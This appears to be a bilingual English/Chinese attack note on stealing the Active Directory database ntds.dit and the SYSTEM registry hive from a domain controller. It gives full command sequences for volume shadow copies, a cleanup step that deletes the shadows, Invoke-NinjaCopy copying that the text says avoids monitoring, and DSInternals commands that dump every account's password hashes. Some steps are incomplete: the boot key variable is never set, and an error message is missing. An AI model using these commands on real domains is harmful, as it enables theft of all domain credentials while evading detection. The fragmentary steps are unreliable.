The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller.
Next, with access to a domain controller’s file system, the adversary can exfiltrate ntds.dit and the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. While running, Active Directory maintains a file system lock on the ntds.dit file, which means simply attempting to copy it will fail.
直接访问或远程访问都可以
方法 1) an adversary may simply stop Active Directory, though this is likely to get them detected; 方法 2) use the Volume Shadow Copy Service (VSS) to snapshot the volume, and extract ntds.dit from the snapshot;
【管理员权限】
C:\Users\Administrator>vssadmin list shadows
C:\Users\Administrator>vssadmin create shadow /for=C:
C:\Users\Administrator>vssadmin list shadows
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\extract\ntds.dit
C:\Users\Administrator>reg save hklm\system c:\extract\SYSTEM_reg
C:\Users\Administrator>vssadmin delete shadows /Shadow={22af24c0-bcd4-46b1-aff7-dce2dc4f25f6} /quiet
C:\Users\Administrator>vssadmin delete shadows /for=c: /quiet
C:\Users\Administrator>vssadmin list shadows
方法 3) Use buit-in tools like NTDSUtil.exe or DSDBUtil.exe; 方法 4) use PowerShell tools like PowerSploit’s Invoke-NinjaCopy.
One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems.
PS C:\Users\Administrator\Desktop> Invoke-NinjaCopy -Path c:\windows\system32\config\system -LocalDestination C:\extract
2\system -Verbose
PS C:\Users\Administrator\Desktop> Invoke-NinjaCopy -Path c:\windows\ntds\ntds.dit -LocalDestination C:\extract
2\ntds.dit -Verbose
Install-Module DSInternals
Import-Module DSInternals
Get-BootKey -SystemHiveFilePath .\extract\SYSTEM_reg
Get-ADDBAccount -BootKey $bootkey -DatabasePath '.\extract\ntds.dit' -All | Out-File .\extract\result.txt
如果执行Get-ADDBAccount出现以下错误:
执行以下命令:
esentutl /p c:\extract\ntds.dit /!10240 /8 /o